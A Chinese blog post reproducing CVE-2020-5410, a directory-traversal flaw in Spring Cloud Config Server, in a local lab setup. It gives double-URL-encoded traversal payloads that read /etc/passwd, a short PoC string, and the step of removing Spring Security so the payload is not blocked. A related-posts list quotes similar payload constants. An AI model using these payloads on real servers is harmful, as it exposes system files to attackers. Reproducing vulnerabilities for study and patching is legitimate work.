[CVE-2020-5410]spring-cloud-config路径穿越导致的信息泄露

最新推荐文章于 2023-03-10 10:38:37 发布
最新推荐文章于 2023-03-10 10:38:37 发布
阅读量1.4k 收藏 1
点赞数
分类专栏: java 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/106906603
版权
安全 同时被 2 个专栏收录
264 篇文章 8 订阅
订阅专栏
java
213 篇文章 3 订阅
订阅专栏

用之前的环境即可:
https://github.com/shadowsock5/spring-cloud-config-starter

PoC参考:

  • https://github.com/osamahamad/CVE-2020-5410-POC
  • https://github.com/threedr3am/learnjavabug/blob/a13aad49c93c05e6fb9db7668a9de6b0b1106307/spring/spring-cloud-config-server-CVE-2020-5410/src/main/java/com/threedr3am/bug/spring/config/server/package-info.java
  • CVE-2020-5410 Spring Cloud Config目录穿越漏洞
127.0.0.1:8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development

利用核心:使用#去注释掉springboot自动拼接的配置文件后缀

但是发现使用之前的环境是带着Spring Security的,由于payload中含有%25,命中其黑名单被拦截:
在这里插入图片描述
参考threedr3am大佬的:
https://github.com/threedr3am/learnjavabug/blob/master/spring/spring-cloud-config-server-CVE-2020-5410/pom.xml
去掉这部分:

<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-security</artifactId>
    <version>2.2.2.RELEASE</version>
</dependency>

再重新启动。

PoC:

payload = "222.txt"
url = "/..%252F..%252F..%252F..%252F..%252F{0}%23/222/11".format(payload)

在这里插入图片描述
native的目录在:

/home/77/repos/spring-cloud-config-starter/config-repo

在这里插入图片描述
Payload为:

/..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23111/222

影响范围

Spring Cloud Config

2.2.0 to 2.2.2
2.1.0 to 2.1.8

caiqiiqi
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Spring Cloud Config 目录穿越漏洞(CVE-2020-5410) 复现
Brucetg的博客
06-15 4955
Spring Cloud Config Spring Cloud Config 是 Spring Cloud 中用于分布式配置管理的组件,Spring Cloud Config 为分布式系统中的外部配置提供服务器和客户端支持。 影响版本 Spring Cloud Config: 2.2.0 to 2.2.2 Spring Cloud Config: 2.1.0 to 2.1.8 复现过程 https://github.com/spring-cloud/spring-cloud-config/releas
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
Spring Cloud Config 目录穿越漏洞(CVE-2020-5410)复现
yzl_007的博客
08-08 2082
Spring Cloud Config 目录穿越漏洞(CVE-2020-5410)复现 漏洞介绍 Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击 影响版本 Spring Cloud Config: 2.2.0 to 2.2.2 Spring Cloud Config: 2.
[Vulfocus解题系列] Spring 目录遍历 (CVE-2020-5410
00勇士王子的博客
07-13 2444
漏洞介绍 名称: Spring 目录遍历 (CVE-2020-5410 ) 描述: Spring Cloud Config是美国威睿(VMware)公司的一套分布式系统的配置管理解决方案。该产品主要为分布式系统中的外部配置提供服务器和客户端支持。 Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可
Spring 目录遍历 (CVE-2020-5410 )复现
YouthBelief的博客
11-03 948
Spring 目录遍历 (CVE-2020-5410 ) Spring 目录遍历 (CVE-2020-5410 )0x01 漏洞描述0x02 影响范围0x03 漏洞复现0x04 漏洞修复 Spring 目录遍历 (CVE-2020-5410 ) 0x01 漏洞描述 Spring Cloud Config是美国威睿(VMware)公司的一套分布式系统的配置管理解决方案。该产品主要为分布式系统中的外部配置提供服务器和客户端支持。 Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9
CVE-2020-5410: Spring Cloud Config Server 目录遍历漏洞通告
爱国小白帽
06-03 2344
CVE-2020-5410: Spring Cloud Config Server 目录遍历漏洞通告 360-CERT [三六零CERT](javascript:void(0)???? 昨天 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HwKUmigU-1591180764214)(https://mmbiz.qpic.cn/mmbiz_jpg/Ic3Rgfdm96f3TFLd7feDIDR9fSLfwvia5uVr9YcNbGcyssibBJCUGb253Z0D64Xbf
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-...
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
SpringCloud CVE_2019_3799--CVE_2020_5410 批量poc
weixin_45427650的博客
04-17 823
import requests import argparse import re CVE_2019_3799_win = r'/aaa/bbb/master/..%252F..%252F..%252F..%252F..%252F..%252Fwindows/win.ini' CVE_2019_3799_linux = r'/foo/default/master/..%252F..%252F..%252F..%252Fetc%252fpasswd' CVE_2020_5410_linux = r'/..
【漏洞复现-spring-目录遍历】vulfocus/spring-cve_2020_5410
10-15 1312
【spring-目录遍历】
spring cloud config server目录遍历漏洞 CVE-2020-5410
weixin_47267061的博客
03-10 442
Spring Cloud Config 目录穿越漏洞(CVE-2020-5410)复现
Spring 目录遍历 (CVE-2020-5410)~vulfocus/spring-cve_2020_5410:latest
qq_34341458的博客
04-11 4022
0x01 描述 Spring Cloud Config是美国威睿(VMware)公司的一套分布式系统的配置管理解决方案。该产品主要为分布式系统中的外部配置提供服务器和客户端支持。 Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击。 0x02 靶场地址 靶场地址:http://v
Saltstack CVE-2020-11651和CVE-2020-11652复现
dzqxwzoe的博客
01-12 205
SaltStack是基于Python开发的一套C/S架构配置管理工具,是一个服务器基础架构集中化管理平台,具备配置管理、远程执行、监控等功能,基于Python语言实现,结合轻量级消息队列(ZeroMQ)与Python第三方模块(Pyzmq、PyCrypto、Pyjinjia2、python-msgpack和PyYAML等)构建。在CVE-2020-11651认证绕过漏洞中,攻击者通过构造恶意请求,可以绕过Salt Master的验证逻辑,调用相关未授权函数功能,从而可以造成远程命令执行漏洞。
Spring框架漏洞合集
小小猪的博客
08-18 7838
Spring框架漏洞合集 Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977) 访问路径/oauth/authorize,会看到左上角有个绿色叶子的标志,一般都是spring或者springboot 直接打poc,可以看到有el表达式注入的形式 /oauth/authorize?response_type=${2*3}&client_id=acme&scope=openid&redirect_uri=http://test 如果要
Spring 目录遍历(CVE-2020-5410)
weixin_46801402的博客
11-02 483
Spring 目录遍历(CVE-2020-5410)
【漏洞通告】微软SMBv3协议远程代码执行漏洞(CVE-2020-0796)PoC公开处置手册
爱国小白帽
06-03 1786
【漏洞通告】微软SMBv3协议远程代码执行漏洞(CVE-2020-0796)PoC公开处置手册 原创 威胁对抗能力部 [绿盟科技安全情报](javascript:void(0)???? 今天 通告编号:NS-2020-0017-2 2020-06-03 TA****G: SMBv3、远程代码执行、CVE-2020-0796 漏洞等级: 高,可导致远程代码执行,易被蠕虫利用传播恶意程序。 应急等级: 黄色 版本: 1.2 1 漏洞概述 北京时间6月2日晚,绿盟科技监测到有研究人员公
修复OpenSSH信息泄露漏洞(CVE-2020-14145)
最新发布
06-13
修复OpenSSH信息泄露漏洞(CVE-2020-14145)的步骤如下: 1. 确认受影响的OpenSSH版本:6.2到8.x版本(不包括8.8版本)。 2. 升级OpenSSH版本到8.8或更高版本。你可以从OpenSSH官网下载最新版本:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值